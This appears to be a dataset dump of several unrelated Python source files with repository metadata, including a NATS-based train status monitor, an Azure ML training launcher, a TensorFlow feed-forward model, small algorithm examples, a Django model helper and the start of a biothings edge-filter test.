| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b537ff6eac7f94b76cf8db09b3957cee998efb52
| 4,531
|
py
|
Python
|
usecase-2/monitoring/fleet-seat-info-monitor/src/seat_res_train_monitor.py
|
edgefarm/edgefarm-demos
|
6381d4a2f7f9c1d0632ab8123fed2bd0763d3b34
|
[
"MIT"
] | null | null | null |
usecase-2/monitoring/fleet-seat-info-monitor/src/seat_res_train_monitor.py
|
edgefarm/edgefarm-demos
|
6381d4a2f7f9c1d0632ab8123fed2bd0763d3b34
|
[
"MIT"
] | 9
|
2021-04-21T10:37:45.000Z
|
2021-07-28T05:56:50.000Z
|
usecase-2/monitoring/fleet-seat-info-monitor/src/seat_res_train_monitor.py
|
edgefarm/train-simulation
|
6381d4a2f7f9c1d0632ab8123fed2bd0763d3b34
|
[
"MIT"
] | null | null | null |
import logging
import datetime
import asyncio
from edgefarm_application.base.application_module import application_module_network_nats
from edgefarm_application.base.avro import schemaless_decode
from run_task import run_task
from state_tracker import StateTracker
from schema_loader import schema_load
_logger = logging.getLogger(__name__)
_state_report_subject = "public.seatres.status"
class SeatResTrainMonitor:
def __init__(self, train_id, q):
self.train_id = train_id
self.edge_report_ts = None
# this is the combined state from the train and the train online state
self.state = StateTracker(
"TrainSeatRes",
{
"UNKNOWN": "unknown",
"OFFLINE": "offline",
"ONLINE-UNKNOWN": "online, unclear state",
"ONLINE-NOK": "online, but not ok",
"ONLINE-OK": "online, ok",
},
)
# this is just the online state of the train
self.state_online = StateTracker(
"Train-Online-Monitor",
{
"UNKNOWN": "train state unknown",
"OFFLINE": "train is offline",
"ONLINE": "train is online",
},
)
self._q = q
self._task = asyncio.create_task(run_task(_logger, q, self._watchdog))
async def start(self):
self.state.update("UNKNOWN")
await self.state_online.update_and_send_event("UNKNOWN", self._send_event)
def stop(self):
self._task.cancel()
async def update_edge_state(self, state):
self.edge_report_ts = datetime.datetime.now()
if state == -1:
    up_state = "ONLINE-UNKNOWN"
elif state == 0:
    up_state = "ONLINE-NOK"
elif state == 1:
    up_state = "ONLINE-OK"
else:
    # defensive default so an unexpected report value cannot leave up_state unbound
    up_state = "ONLINE-UNKNOWN"
self.state.update(up_state)
await self.state_online.update_and_send_event("ONLINE", self._send_event)
async def _watchdog(self):
while True:
now = datetime.datetime.now()
if self.edge_report_ts is not None:
if (now - self.edge_report_ts).total_seconds() > 10:
self.state.update("OFFLINE")
await self.state_online.update_and_send_event(
"OFFLINE", self._send_event
)
await asyncio.sleep(1)
async def _send_event(self, data):
data["train_id"] = self.train_id
await self._q.put(data)
class TrainStatusCollector:
"""
Collect seat reservation system status of all trains.
The individual trains report their SeatRes state via the NATS subject 'public.seatres.status' to
this module.
"""
def __init__(self, q):
self._nc = application_module_network_nats()
self._q = q
self._state_report_codec = schema_load(__file__, "system_status")
self._trains = {}
async def start(self):
self._state_report_subscription_id = await self._nc.subscribe(
_state_report_subject, cb=self._state_report_handler
)
async def stop(self):
await self._nc.unsubscribe(self._state_report_subscription_id)
for v in self._trains.values():
v.stop()
async def add_train(self, train_id):
if train_id not in self._trains.keys():
v = SeatResTrainMonitor(train_id, self._q)
self._trains[train_id] = v
await v.start()
else:
v = self._trains[train_id]
return v
def trains(self):
return self._trains.values()
async def _state_report_handler(self, nats_msg):
"""
Called when a NATS message is received on _state_report_subject
"""
reply_subject = nats_msg.reply
msg = schemaless_decode(nats_msg.data, self._state_report_codec)
_logger.debug(f"state report received msg {msg}")
train_id = msg["data"]["trainId"]
try:
v = self._trains[train_id]
await self._update_edge_state(v, msg)
except KeyError:
_logger.info(f"received state report from new train {train_id}")
v = await self.add_train(train_id)
await self._update_edge_state(v, msg)
await self._nc.publish(reply_subject, b"")
async def _update_edge_state(self, v, msg):
try:
await v.update_edge_state(msg["data"]["status"])
except KeyError:
_logger.error(f"couldn't find [data][status] in {msg}")
| 31.685315
| 96
| 0.608034
| 549
| 4,531
| 4.73224
| 0.238616
| 0.037721
| 0.028868
| 0.024634
| 0.156274
| 0.111624
| 0.070824
| 0.070824
| 0.026944
| 0
| 0
| 0.001888
| 0.29861
| 4,531
| 142
| 97
| 31.908451
| 0.815607
| 0.060252
| 0
| 0.115385
| 0
| 0
| 0.110227
| 0.005065
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.076923
| 0.009615
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b538595bde41c89c5a8fbdc33e2ae560a927b953
| 1,597
|
py
|
Python
|
src/AML/run_training.py
|
monkeypants/CartridgeOCR
|
a2cdaa72e3839a881118b85f5ff7b4515579004b
|
[
"MIT"
] | 2
|
2021-07-12T02:37:46.000Z
|
2021-12-28T23:03:20.000Z
|
src/AML/run_training.py
|
monkeypants/CartridgeOCR
|
a2cdaa72e3839a881118b85f5ff7b4515579004b
|
[
"MIT"
] | 28
|
2021-12-29T00:51:24.000Z
|
2022-03-24T08:03:59.000Z
|
src/AML/run_training.py
|
monkeypants/CartridgeOCR
|
a2cdaa72e3839a881118b85f5ff7b4515579004b
|
[
"MIT"
] | 4
|
2021-09-24T16:13:43.000Z
|
2022-03-09T17:52:35.000Z
|
import sys
from azureml.core import Workspace, Experiment, Environment, ScriptRunConfig
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
from shutil import copy
ws = Workspace.from_config()
# Choose a name for your CPU cluster
# cpu_cluster_name = "cpucluster"
cpu_cluster_name = "gpucompute"
experiment_name = "main"
src_dir = "model"
script = "train.py"
# Verify that cluster does not exist already
try:
cpu_cluster = ComputeTarget(workspace=ws, name=cpu_cluster_name)
print('Found existing cluster, use it.')
except ComputeTargetException:
compute_config = AmlCompute.provisioning_configuration(vm_size='Standard_DS12_v2',
max_nodes=4)
cpu_cluster = ComputeTarget.create(ws, cpu_cluster_name, compute_config)
cpu_cluster.wait_for_completion(show_output=True)
experiment = Experiment(workspace=ws, name=experiment_name)
copy('./config.json', 'model/config.json')
myenv = Environment.from_pip_requirements(name="myenv",
file_path="requirements.txt")
myenv.environment_variables['PYTHONPATH'] = './model'
myenv.environment_variables['RUNINAZURE'] = 'true'
config = ScriptRunConfig(source_directory=src_dir,
script="./training/train.py",
arguments=sys.argv[1:] if len(sys.argv) > 1 else None,
compute_target=cpu_cluster_name, environment=myenv)
run = experiment.submit(config)
aml_url = run.get_portal_url()
print(aml_url)
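# Illustrative invocation (assumption: any extra CLI arguments are forwarded
# verbatim to model/training/train.py, whose flags are project-specific):
#   python run_training.py --epochs 5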
| 35.488889
| 86
| 0.708203
| 187
| 1,597
| 5.834225
| 0.475936
| 0.082493
| 0.064161
| 0.04033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004688
| 0.198497
| 1,597
| 44
| 87
| 36.295455
| 0.847656
| 0.068253
| 0
| 0
| 0
| 0
| 0.117925
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.16129
| 0
| 0.16129
| 0.064516
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b538fc619dc6adad01e93a8132a517e7cc8b2d80
| 818
|
py
|
Python
|
tests/conftest.py
|
cielavenir/pyppmd-py2
|
c148b8fbe7cb0c0e9f68fdf9a1c3599325f0e4c8
|
[
"BSD-3-Clause"
] | 3
|
2021-05-04T13:20:39.000Z
|
2021-11-03T12:43:02.000Z
|
tests/conftest.py
|
cielavenir/pyppmd-py2
|
c148b8fbe7cb0c0e9f68fdf9a1c3599325f0e4c8
|
[
"BSD-3-Clause"
] | 39
|
2021-04-16T02:55:28.000Z
|
2022-03-30T14:23:50.000Z
|
tests/conftest.py
|
cielavenir/pyppmd-py2
|
c148b8fbe7cb0c0e9f68fdf9a1c3599325f0e4c8
|
[
"BSD-3-Clause"
] | 3
|
2021-07-07T17:39:30.000Z
|
2022-03-30T15:15:44.000Z
|
import cpuinfo
def pytest_benchmark_update_json(config, benchmarks, output_json):
"""Calculate compression/decompression speed and add as extra_info"""
for benchmark in output_json["benchmarks"]:
if "data_size" in benchmark["extra_info"]:
rate = benchmark["extra_info"].get("data_size", 0.0) / benchmark["stats"]["mean"]
benchmark["extra_info"]["rate"] = rate
def pytest_benchmark_update_machine_info(config, machine_info):
cpu_info = cpuinfo.get_cpu_info()
brand = cpu_info.get("brand_raw", None)
if brand is None:
brand = "{} core(s) {} CPU ".format(cpu_info.get("count", "unknown"), cpu_info.get("arch", "unknown"))
machine_info["cpu"]["brand"] = brand
machine_info["cpu"]["hz_actual_friendly"] = cpu_info.get("hz_actual_friendly", "unknown")
| 43.052632
| 110
| 0.684597
| 109
| 818
| 4.862385
| 0.40367
| 0.079245
| 0.075472
| 0.090566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00292
| 0.162592
| 818
| 18
| 111
| 45.444444
| 0.770803
| 0.077017
| 0
| 0
| 0
| 0
| 0.233645
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153846
| false
| 0
| 0.076923
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b53920dd20dbdafabadb24be44f2a512437147fb
| 331
|
py
|
Python
|
examples/test_gcld3.py
|
lbp0200/EasyNMT
|
d253e9346996a47aa989bb33aed72e531528dc27
|
[
"Apache-2.0"
] | null | null | null |
examples/test_gcld3.py
|
lbp0200/EasyNMT
|
d253e9346996a47aa989bb33aed72e531528dc27
|
[
"Apache-2.0"
] | null | null | null |
examples/test_gcld3.py
|
lbp0200/EasyNMT
|
d253e9346996a47aa989bb33aed72e531528dc27
|
[
"Apache-2.0"
] | null | null | null |
import time
import gcld3
detector = gcld3.NNetLanguageIdentifier(min_num_bytes=0,
max_num_bytes=1000)
# text = "This text is written in English"
text = "薄雾"
while True:
result = detector.FindLanguage(text=text)
print(text, result.probability, result.language)
time.sleep(0.01)
| 25.461538
| 59
| 0.65861
| 41
| 331
| 5.219512
| 0.658537
| 0.074766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.040323
| 0.250755
| 331
| 12
| 60
| 27.583333
| 0.822581
| 0.120846
| 0
| 0
| 0
| 0
| 0.00692
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b539e3fd28c31f9e28937feef603fdbd7a3fc98e
| 1,593
|
py
|
Python
|
src/0075下一个排列/index.py
|
zzh2036/OneDayOneLeetcode
|
1198692e68f8f0dbf15555e45969122e1a92840a
|
[
"MIT"
] | null | null | null |
src/0075下一个排列/index.py
|
zzh2036/OneDayOneLeetcode
|
1198692e68f8f0dbf15555e45969122e1a92840a
|
[
"MIT"
] | null | null | null |
src/0075下一个排列/index.py
|
zzh2036/OneDayOneLeetcode
|
1198692e68f8f0dbf15555e45969122e1a92840a
|
[
"MIT"
] | null | null | null |
'''
Implement a "next permutation" function: rearrange the given sequence of
numbers into the lexicographically next greater permutation.
If no greater permutation exists, rearrange the numbers into the smallest
possible order (i.e., sorted ascending).
The rearrangement must be done in place, using only constant extra space.
Example 1:
Input:  nums = [1,2,3]
Output: [1,3,2]
Example 2:
Input:  nums = [3,2,1]
Output: [1,2,3]
Example 3:
Input:  nums = [1,1,5]
Output: [1,5,1]
Example 4:
Input:  nums = [1]
Output: [1]
Constraints:
1 <= nums.length <= 100
0 <= nums[i] <= 100
'''
from typing import List

class Solution:
def nextPermutation(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
n = len(nums)
if n <= 1:
return nums
# scan the array from right to left
i = n - 1
while i > 0:
# find an adjacent pair where the right value is greater than the left
if nums[i] > nums[i - 1]:
# scan the elements in the range [i, n - 1] from right to left
j = n - 1
while j >= i:
# find an element in this range larger than nums[i - 1], then swap
if nums[j] > nums[i - 1]:
# swap the two positions
self.exchangeVal(nums, i - 1, j)
# re-sort the range [i, n - 1] ascending, i.e. the smallest arrangement
self.reverseArr(nums, i, n - 1)
return
j -= 1
i -= 1
# a fully descending array: reverse it to get the smallest permutation
self.reverseArr(nums, 0, n - 1)
def exchangeVal(self, arr, left, right):
arr[left], arr[right] = arr[right], arr[left]
def reverseArr(self, arr, begin, end):
while begin < end:
self.exchangeVal(arr, begin, end)
begin += 1
end -= 1
if __name__ == '__main__':
points = [1, 2, 3]
ins = Solution()
ins.nextPermutation(points)
print(points)
| 22.125
| 61
| 0.468927
| 199
| 1,593
| 3.713568
| 0.371859
| 0.040595
| 0.028417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054507
| 0.40113
| 1,593
| 71
| 62
| 22.43662
| 0.720126
| 0.310107
| 0
| 0
| 0
| 0
| 0.007533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0
| 0
| 0.206897
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b53df049332ea39e2f7827214e41edfb7e42ca6c
| 7,885
|
py
|
Python
|
feed_forward_model.py
|
karlschrader/deepPD
|
678793c9026eab2681d2d0a3b7e7f9f91c0f3bc5
|
[
"MIT"
] | null | null | null |
feed_forward_model.py
|
karlschrader/deepPD
|
678793c9026eab2681d2d0a3b7e7f9f91c0f3bc5
|
[
"MIT"
] | null | null | null |
feed_forward_model.py
|
karlschrader/deepPD
|
678793c9026eab2681d2d0a3b7e7f9f91c0f3bc5
|
[
"MIT"
] | null | null | null |
import os
from datetime import datetime
import numpy as np
import tensorflow as tf
from tensorflow.python.training import moving_averages
TF_DTYPE = tf.float64
MOMENTUM = 0.99
EPSILON = 1e-6
DELTA_CLIP = 50.0
class FeedForwardModel():
"""
Abstract class for creating neural networks.
Offers functions to build or clone individual layers or complete networks
"""
def __init__(self, bsde, run_name):
self._bsde = bsde
# ops for statistics update of batch normalization
self._extra_train_ops = []
self.tb_dir = tf.app.flags.FLAGS.tensorboard_dir + run_name + "_" + datetime.now(
).strftime('%Y_%m_%d_%H_%M_%S')
os.mkdir(self.tb_dir)
def _clone_subnetwork(self, input_, timestep, layer_count, weights):
"""
Clone a neural network, using the same weights as the source networks.
Args:
input_ (Tensor): Input of the neural network that will be built
timestep (float): Time index, used for tensor names
layer_count (int): number of layers in the neural network that should be cloned
weights (np.array(size=[num_timesteps, layer_count]))
Returns:
Tensor: Output of the last layer of the neural network
"""
with tf.variable_scope(str(timestep)):
hiddens = self._batch_norm(input_, name='path_input_norm')
for i in range(1, layer_count - 1):
hiddens = self._copy_batch_layer(hiddens, 'layer_{}'.format(i),
i, timestep, weights)
output = self._copy_batch_layer(hiddens, 'final_layer',
layer_count - 1, timestep, weights)
return output
def _subnetwork(self, input_, timestep, num_hiddens):
"""
Generate a neural network
Args:
input_ (Tensor): Input of the neural network that will be built
timestep (float): Time index, used for tensor name
num_hiddens (np.array(size=[layer_count])): Specifies the number
of additional dimensions for each layer of the neural network.
Returns:
Tensor: Output of the last layer of the neural network
"""
matrix_weights = []
with tf.variable_scope(str(timestep)):
# input norm
hiddens = self._batch_norm(input_, name='path_input_norm')
for i in range(1, len(num_hiddens) - 1):
hiddens, weight = self._dense_batch_layer(
hiddens,
num_hiddens[i] + self._bsde.dim,
activation_fn=tf.nn.relu,
layer_name='layer_{}'.format(i),
)
matrix_weights.append(weight)
# last layer without relu
output, weight = self._dense_batch_layer(
hiddens,
num_hiddens[-1] + self._bsde.dim,
activation_fn=None,
layer_name='final_layer',
)
matrix_weights.append(weight)
return output, matrix_weights
def _dense_batch_layer(self,
input_,
output_size,
activation_fn=None,
stddev=5.0,
layer_name="linear"):
"""
Generate one fully connected layer
Args:
input_ (Tensor): Input of layer
output_size (int): Number of outputs this layer should have
KwArgs:
activation_fn (Function): activation function for the neurons in
this layer. Will usually be ReLU, but can be left blank for the last layer.
stddev (float): stddev to use for the initial distribution of weights in this layer
layer_name (string): tensorflow name used for the variables in this layer
Returns:
Tensor: Output of the layer
tf.Variable: Reference to the used Matrix weight
"""
with tf.variable_scope(layer_name):
shape = input_.get_shape().as_list()
weight = tf.get_variable(
'Matrix', [shape[1], output_size],
TF_DTYPE,
tf.random_normal_initializer(
stddev=stddev / np.sqrt(shape[1] + output_size)))
# matrix weight
hiddens = tf.matmul(input_, weight)
#batch norm
hiddens_bn = self._batch_norm(hiddens)
if activation_fn:
return activation_fn(hiddens_bn), weight
return hiddens_bn, weight
def _copy_batch_layer(self, input_, layer_name, layer, timestep, weights):
"""
Copy one fully connected layer, reusing the weights of the previous layer
Args:
input_ (Tensor): Input of layer
layer_name (string): tensorflow name used for the variables in this layer
layer (int): index of the layer in the current timestep
timestep (int): index of the current timestep
weights (np.array(size=[num_timesteps, layer_count])): weight database to copy from
Returns:
Tensor: Output of the layer
"""
with tf.variable_scope(layer_name):
# init matrix weight with matrix weights from primal stage
weight = tf.Variable(weights[timestep - 1][layer - 1], 'Matrix')
hiddens = tf.matmul(input_, weight)
hiddens_bn = self._batch_norm(hiddens)
return hiddens_bn
def _batch_norm(self, input_, name='batch_norm'):
"""
Batch normalize the data
Args:
input_ (Tensor): Input of layer
KwArgs:
name (string): Used as tensorflow name
Returns:
Tensor: Output of the layer
See https://arxiv.org/pdf/1502.03167v3.pdf p.3
"""
with tf.variable_scope(name):
params_shape = [input_.get_shape()[-1]]
beta = tf.get_variable(
'beta',
params_shape,
TF_DTYPE,
initializer=tf.random_normal_initializer(
0.0, stddev=0.1, dtype=TF_DTYPE))
gamma = tf.get_variable(
'gamma',
params_shape,
TF_DTYPE,
initializer=tf.random_uniform_initializer(
0.1, 0.5, dtype=TF_DTYPE))
moving_mean = tf.get_variable(
'moving_mean',
params_shape,
TF_DTYPE,
initializer=tf.constant_initializer(0.0, TF_DTYPE),
trainable=False)
moving_variance = tf.get_variable(
'moving_variance',
params_shape,
TF_DTYPE,
initializer=tf.constant_initializer(1.0, TF_DTYPE),
trainable=False)
# These ops will only be performed when training
mean, variance = tf.nn.moments(input_, [0], name='moments')
self._extra_train_ops.append(
moving_averages.assign_moving_average(moving_mean, mean,
MOMENTUM))
self._extra_train_ops.append(
moving_averages.assign_moving_average(moving_variance,
variance, MOMENTUM))
mean, variance = tf.cond(self._is_training,
lambda: (mean, variance),
lambda: (moving_mean, moving_variance))
hiddens_bn = tf.nn.batch_normalization(input_, mean, variance,
beta, gamma, EPSILON)
hiddens_bn.set_shape(input_.get_shape())
return hiddens_bn
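# Illustrative subclass sketch (an assumption; the abstract class leaves the
# input placeholders, the self._is_training flag, the loss, and the training
# loop to the concrete model):
#
#   class MyModel(FeedForwardModel):
#       def build(self, input_):
#           self._is_training = tf.placeholder(tf.bool, name='is_training')
#           out, ws = self._subnetwork(input_, timestep=0,
#                                      num_hiddens=[0, 10, 10, 1])
#           return out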
| 38.842365
| 95
| 0.557261
| 872
| 7,885
| 4.824541
| 0.231651
| 0.01545
| 0.022819
| 0.02377
| 0.365581
| 0.314476
| 0.246019
| 0.214405
| 0.151652
| 0.151652
| 0
| 0.009419
| 0.367153
| 7,885
| 202
| 96
| 39.034653
| 0.833667
| 0.29423
| 0
| 0.281818
| 0
| 0
| 0.030564
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.045455
| 0
| 0.163636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b540b40d9aaf331bef2f785083b2bbd7ed30bfe6
| 619
|
py
|
Python
|
Fibonacci/Python/fibonacci.py
|
IanDoarn/LearningRepo
|
4c5906b3c1f497a979c3fce89a66d1e571cd6b42
|
[
"MIT"
] | null | null | null |
Fibonacci/Python/fibonacci.py
|
IanDoarn/LearningRepo
|
4c5906b3c1f497a979c3fce89a66d1e571cd6b42
|
[
"MIT"
] | null | null | null |
Fibonacci/Python/fibonacci.py
|
IanDoarn/LearningRepo
|
4c5906b3c1f497a979c3fce89a66d1e571cd6b42
|
[
"MIT"
] | null | null | null |
"""
Fibonacci sequence using python
generators
Written by: Ian Doarn
"""
def fib():
# Generator that yields fibonacci numbers
a, b = 0, 1
while True: # First iteration:
yield a # yield 0 to start with and then
a, b = b, a + b # a will now be 1, and b will also be 1, (0 + 1)
if __name__ == '__main__':
# Maximum fib numbers to print
max_i = 20
for i, fib_n in enumerate(fib()):
#Print each yielded fib number
print('{i:3}: {f:3}'.format(i=i, f=fib_n))
# Break when we hit max_i value
if i == max_i:
break
| 23.807692
| 75
| 0.55412
| 97
| 619
| 3.402062
| 0.57732
| 0.018182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027094
| 0.344103
| 619
| 25
| 76
| 24.76
| 0.785714
| 0.466882
| 0
| 0
| 0
| 0
| 0.063291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b543f58cf6e8b8dc209086801165057172e20d3f
| 1,711
|
py
|
Python
|
scripts/test_spider_roundtrip.py
|
mattr1/seq2struct_forPRs
|
cdc9e3c94380fb479ed3e3c77f370038d27cf2d6
|
[
"MIT"
] | 25
|
2019-07-16T22:32:44.000Z
|
2022-01-25T05:23:07.000Z
|
scripts/test_spider_roundtrip.py
|
mattr1/seq2struct_forPRs
|
cdc9e3c94380fb479ed3e3c77f370038d27cf2d6
|
[
"MIT"
] | 19
|
2018-12-17T20:42:11.000Z
|
2020-02-12T21:29:51.000Z
|
scripts/test_spider_roundtrip.py
|
mattr1/seq2struct_forPRs
|
cdc9e3c94380fb479ed3e3c77f370038d27cf2d6
|
[
"MIT"
] | 22
|
2019-03-16T05:57:27.000Z
|
2020-10-25T04:34:54.000Z
|
import ast
import argparse
import json
import os
import pprint
import astor
import tqdm
import _jsonnet
from seq2struct import datasets
from seq2struct import grammars
from seq2struct.utils import registry
from third_party.spider import evaluation
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--config', required=True)
parser.add_argument('--config-args')
parser.add_argument('--output', required=True)
args = parser.parse_args()
if args.config_args:
config = json.loads(_jsonnet.evaluate_file(args.config, tla_codes={'args': args.config_args}))
else:
config = json.loads(_jsonnet.evaluate_file(args.config))
os.makedirs(args.output, exist_ok=True)
gold = open(os.path.join(args.output, 'gold.txt'), 'w')
predicted = open(os.path.join(args.output, 'predicted.txt'), 'w')
train_data = registry.construct('dataset', config['data']['train'])
grammar = registry.construct('grammar', config['model']['decoder_preproc']['grammar'])
evaluator = evaluation.Evaluator(
'data/spider-20190205/database',
evaluation.build_foreign_key_map_from_json('data/spider-20190205/tables.json'),
'match')
for i, item in enumerate(tqdm.tqdm(train_data, dynamic_ncols=True)):
parsed = grammar.parse(item.code, 'train')
sql = grammar.unparse(parsed, item)
evaluator.evaluate_one(
item.schema.db_id,
item.orig['query'].replace('\t', ' '),
sql)
gold.write('{}\t{}\n'.format(item.orig['query'].replace('\t', ' '), item.schema.db_id))
predicted.write('{}\n'.format(sql))
if __name__ == '__main__':
main()
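# Illustrative invocation (assumption: the jsonnet config path is
# project-specific; gold.txt and predicted.txt land in --output):
#   python scripts/test_spider_roundtrip.py \
#       --config configs/spider-20190205.jsonnet --output roundtrip_out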
| 30.553571
| 102
| 0.663939
| 211
| 1,711
| 5.222749
| 0.417062
| 0.045372
| 0.046279
| 0.041742
| 0.161525
| 0.123412
| 0.079855
| 0.079855
| 0
| 0
| 0
| 0.013709
| 0.189947
| 1,711
| 55
| 103
| 31.109091
| 0.781385
| 0
| 0
| 0
| 0
| 0
| 0.124489
| 0.035652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.285714
| 0
| 0.309524
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5473421d6c0b8e5ed5978ee678700c80296d6a9
| 1,340
|
py
|
Python
|
utils/model_helper.py
|
CocoBir/django-restful-demo
|
aeb7f8a0bcff5c52b528c7b0c48f87de5f392320
|
[
"MIT"
] | null | null | null |
utils/model_helper.py
|
CocoBir/django-restful-demo
|
aeb7f8a0bcff5c52b528c7b0c48f87de5f392320
|
[
"MIT"
] | null | null | null |
utils/model_helper.py
|
CocoBir/django-restful-demo
|
aeb7f8a0bcff5c52b528c7b0c48f87de5f392320
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
model helper
~~~~~~~~~~~~
:Created: 2016-8-5
:Copyright: (c) 2016<smileboywtu@gmail.com>
"""
from customer_exceptions import OffsetOutOfRangeException
class ListModelHelper(object):
"""get the object list"""
@classmethod
def list(cls, index=0, limit=8, sort=None, order='asc'):
"""get the list of the model object
:param index: page index
:param limit: page entry number
:param sort: sort condition
:param order: asc or desc
:return: object list
"""
if not sort:
sort = 'id'
order_by = '-' + sort if order != 'asc' else sort
offset = index * limit
# check the offset
total = cls.objects.count()
if offset > total: raise OffsetOutOfRangeException()
return {
'total': total,
'datalist': cls.objects.order_by(order_by)\
[offset:offset + limit]
}
class ViewModelHelper(object):
"""get a single instance"""
@classmethod
def view(cls, pk):
"""
get a specific objects
:param pk: primary key
:return:
"""
return cls.objects.get(id=pk)
class GenericModelHelper(ListModelHelper, ViewModelHelper):
pass
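# Illustrative usage sketch (an assumption, not part of this module): mix the
# helper into a Django model so list/view become class-level shortcuts.
#
#   from django.db import models
#   from utils.model_helper import GenericModelHelper
#
#   class Article(models.Model, GenericModelHelper):
#       title = models.CharField(max_length=100)
#
#   page = Article.list(index=0, limit=8, sort='title', order='desc')
#   one = Article.view(pk=1)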
| 23.103448
| 60
| 0.568657
| 144
| 1,340
| 5.263889
| 0.465278
| 0.031662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014161
| 0.314925
| 1,340
| 57
| 61
| 23.508772
| 0.811547
| 0.319403
| 0
| 0.095238
| 0
| 0
| 0.028424
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0.047619
| 0.047619
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5484bee48cb34153d413c1639f3e4d36037235a
| 2,323
|
py
|
Python
|
tests/test_filters/test_edges.py
|
luluricketts/biothings_explorer
|
ae2009ff285f96a08e0145f242846ca613b5069c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_filters/test_edges.py
|
luluricketts/biothings_explorer
|
ae2009ff285f96a08e0145f242846ca613b5069c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_filters/test_edges.py
|
luluricketts/biothings_explorer
|
ae2009ff285f96a08e0145f242846ca613b5069c
|
[
"Apache-2.0"
] | null | null | null |
"""
Tests for edges.py
"""
import unittest
import pandas as pd
from biothings_explorer.user_query_dispatcher import SingleEdgeQueryDispatcher
from biothings_explorer.filters.edges import filter_node_degree
class TestFilterEdges(unittest.TestCase):
# test for count values
def test_count_values(self):
counts = [10, 20, 40, 50, 100]
seqd = SingleEdgeQueryDispatcher(input_cls='Gene',
output_cls='ChemicalSubstance',
input_id='NCBIGene',
values='1017')
seqd.query()
for count in counts:
newG = filter_node_degree(seqd.G, count)
self.assertEqual(len(newG.nodes), count+1)
# edge case test if count > num nodes, then returns num_nodes results
def test_num_nodes(self):
count = 1000
